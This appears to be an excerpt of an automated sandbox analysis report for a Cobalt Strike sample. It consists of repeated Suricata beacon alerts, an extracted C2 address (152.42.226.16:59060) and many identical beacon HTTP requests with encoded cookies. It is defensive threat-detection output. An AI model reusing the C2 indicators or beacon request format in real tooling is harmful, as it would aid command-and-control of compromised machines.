                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50074 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50075 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50072 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50077 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50073 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50078 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50079 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50076 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50056 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50080 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50082 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50081 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50083 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50085 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50084 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50016 -> 152.42.226.16:59060
                    Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50045 -> 152.42.226.16:59060
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 152.42.226.16
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50029 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50075 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 59060
                    Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 59060
                    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 152.42.226.16:59060
                    Source: Joe Sandbox ViewASN Name: NCRENUS NCRENUS
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
